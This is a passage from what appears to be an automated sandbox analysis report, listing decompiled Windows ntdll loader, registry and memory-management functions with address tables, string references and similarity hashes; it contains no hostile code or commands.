                                              Strings
                                              • LdrpDoPostSnapWork, xrefs: 01009C1E
                                              • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01009C18
                                              • minkernel\ntdll\ldrsnap.c, xrefs: 01009C28
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                              • API String ID: 2994545307-1948996284
                                              • Opcode ID: 5d2d8a1c3326b95a04423e97e6d67e0937e689ecace1816e0ec22afecb5b2449
                                              • Instruction ID: 2a3489585acd431fd8d2665ec003f40e4565beeec527b04338c919fed55219aa
                                              • Opcode Fuzzy Hash: 5d2d8a1c3326b95a04423e97e6d67e0937e689ecace1816e0ec22afecb5b2449
                                              • Instruction Fuzzy Hash: EF91D071A0021A9BDF18DF5AC881AFAB3B9FF84354B544169E945AB241DF31ED02EF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FB7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 98%
                                              			E00FB7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E00FBCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E00FAC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1095780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01025510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1095780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E00FC7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00FC7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01027016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E00FC7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00FC7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01027016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E00FDA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E00FAB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                              0x00fb7e4c
                                              0x00fb7e50
                                              0x00fb7e55
                                              0x00fb7e58
                                              0x00fb7e5d
                                              0x00fb7e71
                                              0x00fb7f33
                                              0x00fb7e77
                                              0x00fb7e77
                                              0x00fb7e79
                                              0x00fb7e79
                                              0x00fb7e7e
                                              0x00fb7f45
                                              0x01009848
                                              0x00000000
                                              0x01009848
                                              0x00fb7f4e
                                              0x00fb7f53
                                              0x00fb7f5a
                                              0x00000000
                                              0x00000000
                                              0x0100985a
                                              0x01009862
                                              0x01009866
                                              0x00000000
                                              0x0100986c
                                              0x00000000
                                              0x0100986c
                                              0x00fb7e84
                                              0x00fb7e84
                                              0x00fb7e8d
                                              0x01009871
                                              0x00fb7eb8
                                              0x00fb7ec0
                                              0x00fb7ec0
                                              0x00fb7e9a
                                              0x0100987e
                                              0x00000000
                                              0x00000000
                                              0x01009884
                                              0x0100988b
                                              0x010098a7
                                              0x010098ac
                                              0x010098b1
                                              0x010098b6
                                              0x010098b8
                                              0x010098b8
                                              0x010098b9
                                              0x00000000
                                              0x010098b9
                                              0x00fb7ea0
                                              0x00fb7ea7
                                              0x00000000
                                              0x00000000
                                              0x00fb7eac
                                              0x00fb7eb1
                                              0x00fb7ec6
                                              0x00fb7ed0
                                              0x010098cc
                                              0x00fb7ed6
                                              0x00fb7ed6
                                              0x00fb7ed6
                                              0x00fb7ede
                                              0x00fb7ee3
                                              0x010098e3
                                              0x010098f0
                                              0x01009902
                                              0x010098f2
                                              0x010098fb
                                              0x010098fb
                                              0x01009907
                                              0x0100991d
                                              0x0100991d
                                              0x01009907
                                              0x010098e3
                                              0x00fb7ef0
                                              0x00fb7f14
                                              0x00fb7f14
                                              0x00fb7f1e
                                              0x01009946
                                              0x00fb7f24
                                              0x00fb7f24
                                              0x00fb7f24
                                              0x00fb7f2c
                                              0x0100996a
                                              0x01009975
                                              0x01009975
                                              0x0100997e
                                              0x01009993
                                              0x01009993
                                              0x0100997e
                                              0x00000000
                                              0x00fb7ef2
                                              0x00fb7efc
                                              0x00fb7f0a
                                              0x00fb7f0e
                                              0x01009933
                                              0x00000000
                                              0x01009933
                                              0x00000000
                                              0x00fb7f0e
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00fb7eb1

                                              Strings
                                              • minkernel\ntdll\ldrmap.c, xrefs: 010098A2
                                              • LdrpCompleteMapModule, xrefs: 01009898
                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 01009891
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                              • API String ID: 0-1676968949
                                              • Opcode ID: ef40678f40ae1d482164a5d6193d14ec894550c86d6c09ac599c56aee76e664c
                                              • Instruction ID: acf1725d5267e8c647dfa5603b215e5e11165bd70e90ab2f0e69bd3cdc22ba5c
                                              • Opcode Fuzzy Hash: ef40678f40ae1d482164a5d6193d14ec894550c86d6c09ac599c56aee76e664c
                                              • Instruction Fuzzy Hash: 37512531A08741DBE722EB5DC984BAABBE0AF84314F140599E9959B3D2C734ED00EB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FAE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 93%
                                              			E00FAE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E00FAF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E00FE95D0();
						}
						if(_t78 != 0) {
							L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E00FEFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E00FEBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E00FE9600();
					if(_t97 < 0) {
						goto L6;
					}
					E00FEBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L00FAF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E00FEBB40(_t83, _t102 + 0x24, _t78);
								if(L00FB43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E00FEBB40(_t84, _t102 + 0x24, _t94);
									if(L00FB43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                              0x00fae620
                                              0x00fae628
                                              0x00fae62f
                                              0x00fae631
                                              0x00fae635
                                              0x00fae637
                                              0x00fae63e
                                              0x01005503
                                              0x01005503
                                              0x00fae64c
                                              0x00fae64c
                                              0x00fae651
                                              0x00000000
                                              0x00000000
                                              0x00fae661
                                              0x00fae665
                                              0x0100542a
                                              0x00fae715
                                              0x00fae71a
                                              0x00fae71c
                                              0x00fae720
                                              0x00fae720
                                              0x00fae727
                                              0x00fae736
                                              0x00fae736
                                              0x00fae743
                                              0x00fae743
                                              0x00fae673
                                              0x00fae678
                                              0x00fae67d
                                              0x00fae682
                                              0x00fae685
                                              0x00fae692
                                              0x00fae69b
                                              0x00fae6a3
                                              0x00fae6ad
                                              0x00fae6b1
                                              0x00fae6b2
                                              0x00fae6bb
                                              0x00fae6bf
                                              0x00fae6c0
                                              0x00fae6c8
                                              0x00fae6cc
                                              0x00fae6d5
                                              0x00fae6d9
                                              0x00000000
                                              0x00000000
                                              0x00fae6e5
                                              0x00fae6ea
                                              0x00fae6f9
                                              0x00fae70b
                                              0x00fae70f
                                              0x01005439
                                              0x0100545e
                                              0x0100545e
                                              0x00000000
                                              0x0100545e
                                              0x0100543b
                                              0x0100543e
                                              0x01005440
                                              0x01005445
                                              0x01005472
                                              0x01005475
                                              0x0100548d
                                              0x01005493
                                              0x010054a9
                                              0x00000000
                                              0x00000000
                                              0x010054ab
                                              0x010054b4
                                              0x010054bc
                                              0x010054c8
                                              0x010054de
                                              0x010054fb
                                              0x010054e0
                                              0x010054e6
                                              0x010054eb
                                              0x010054eb
                                              0x010054de
                                              0x00000000
                                              0x010054bc
                                              0x01005477
                                              0x0100547a
                                              0x01005480
                                              0x01005483
                                              0x01005486
                                              0x0100548b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0100548b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x01005447
                                              0x01005447
                                              0x01005447
                                              0x01005447
                                              0x0100544e
                                              0x00000000
                                              0x00000000
                                              0x01005450
                                              0x01005452
                                              0x01005455
                                              0x0100545a
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0100545c
                                              0x0100546a
                                              0x0100546d
                                              0x0100546f
                                              0x00000000
                                              0x0100546f
                                              0x00fae70f

                                              Strings
                                              • InstallLanguageFallback, xrefs: 00FAE6DB
                                              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00FAE68C
                                              • @, xrefs: 00FAE6C0
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                              • API String ID: 0-1757540487
                                              • Opcode ID: d2b0c05d6d6f31b4d6220a3e499089892b6ee3539664094ccd300edb5a670752
                                              • Instruction ID: 1616886daf6eeae740c0f4ab4585d8a1268a96a7dfa6dc95fed3919d72bb64ab
                                              • Opcode Fuzzy Hash: d2b0c05d6d6f31b4d6220a3e499089892b6ee3539664094ccd300edb5a670752
                                              • Instruction Fuzzy Hash: EC51D2B25083469BD711DF28C840BABB3E8BF89714F05096EF985D7291FB34D904DBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0106E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 60%
                                              			E0106E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0106BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0106BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0106AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E00FE9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0106A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0106A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E00FE9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0106A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0106A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E00FC2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E00FBB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E00FBFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E00FC7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0105FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                              0x0106e547
                                              0x0106e549
                                              0x0106e54f
                                              0x0106e553
                                              0x0106e557
                                              0x0106e55a
                                              0x0106e55c
                                              0x0106e55f
                                              0x0106e561
                                              0x0106e567
                                              0x0106e56b
                                              0x0106e7e2
                                              0x00000000
                                              0x0106e571
                                              0x0106e575
                                              0x0106e577
                                              0x0106e57b
                                              0x0106e57c
                                              0x0106e57d
                                              0x0106e57e
                                              0x0106e57f
                                              0x0106e588
                                              0x0106e58f
                                              0x0106e591
                                              0x0106e592
                                              0x0106e592
                                              0x0106e596
                                              0x0106e59e
                                              0x0106e5a0
                                              0x0106e5a6
                                              0x0106e61d
                                              0x0106e61d
                                              0x0106e621
                                              0x0106e623
                                              0x0106e630
                                              0x0106e630
                                              0x0106e7e6
                                              0x0106e7eb
                                              0x0106e7ed
                                              0x0106e7f4
                                              0x0106e7fa
                                              0x0106e7ff
                                              0x0106e7ff
                                              0x0106e80a
                                              0x0106e812
                                              0x0106e812
                                              0x0106e5ab
                                              0x0106e5b4
                                              0x0106e5b9
                                              0x0106e5be
                                              0x0106e5c0
                                              0x0106e5c2
                                              0x0106e5c8
                                              0x0106e5c9
                                              0x0106e5cb
                                              0x0106e5cc
                                              0x0106e5d5
                                              0x0106e5e4
                                              0x0106e5f1
                                              0x0106e5f8
                                              0x0106e5f8
                                              0x0106e5d5
                                              0x0106e602
                                              0x0106e616
                                              0x0106e63d
                                              0x0106e644
                                              0x0106e64d
                                              0x0106e652
                                              0x0106e657
                                              0x0106e659
                                              0x0106e65b
                                              0x0106e661
                                              0x0106e662
                                              0x0106e664
                                              0x0106e665
                                              0x0106e66e
                                              0x0106e67d
                                              0x0106e68a
                                              0x0106e691
                                              0x0106e691
                                              0x0106e66e
                                              0x0106e6b0
                                              0x00000000
                                              0x0106e6b6
                                              0x0106e6bd
                                              0x0106e6c7
                                              0x0106e6d7
                                              0x0106e6d9
                                              0x0106e6db
                                              0x0106e6de
                                              0x0106e6e3
                                              0x0106e6f3
                                              0x0106e6fc
                                              0x0106e700
                                              0x0106e700
                                              0x0106e704
                                              0x0106e70a
                                              0x0106e70a
                                              0x0106e713
                                              0x0106e716
                                              0x0106e719
                                              0x0106e720
                                              0x0106e761
                                              0x0106e76b
                                              0x0106e774
                                              0x0106e77a
                                              0x0106e77a
                                              0x0106e78a
                                              0x0106e791
                                              0x0106e799
                                              0x0106e79b
                                              0x0106e79f
                                              0x0106e7aa
                                              0x0106e7c0
                                              0x0106e7ac
                                              0x0106e7b2
                                              0x0106e7b9
                                              0x0106e7b9
                                              0x0106e7c7
                                              0x0106e806
                                              0x00000000
                                              0x0106e7c9
                                              0x0106e7d1
                                              0x0106e7d8
                                              0x00000000
                                              0x0106e7d8
                                              0x00000000
                                              0x00000000
                                              0x0106e722
                                              0x0106e72e
                                              0x0106e748
                                              0x0106e74c
                                              0x0106e754
                                              0x0106e756
                                              0x0106e75c
                                              0x0106e75c
                                              0x00000000
                                              0x0106e75c
                                              0x0106e758
                                              0x0106e758
                                              0x00000000
                                              0x0106e758
                                              0x0106e750
                                              0x00000000
                                              0x00000000
                                              0x0106e752
                                              0x00000000
                                              0x0106e752
                                              0x0106e730
                                              0x0106e735
                                              0x0106e73d
                                              0x0106e73f
                                              0x00000000
                                              0x00000000
                                              0x0106e741
                                              0x0106e741
                                              0x00000000
                                              0x0106e741
                                              0x0106e739
                                              0x00000000
                                              0x00000000
                                              0x0106e73b
                                              0x00000000
                                              0x0106e73b
                                              0x0106e722
                                              0x0106e720
                                              0x0106e6b0
                                              0x0106e618
                                              0x00000000
                                              0x0106e618

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: `$`
                                              • API String ID: 0-197956300
                                              • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                              • Instruction ID: f7d1241288b2db1b2576b0976aa0989866e5e26c18b5077560c31f973d432698
                                              • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                              • Instruction Fuzzy Hash: 6491AF752043429FE764CE29C841B5BBBE9BF84714F14896DFAD9CB280E774E908CB52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 010251BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 77%
                                              			E010251BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x10805f0);
				E00FFD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E00FBEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E010253CA(0);
						return E00FFD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E00FEF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E00FC3690(1, _t117, 0xf81810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E00FEAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L00FC4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E00FEAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0102500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
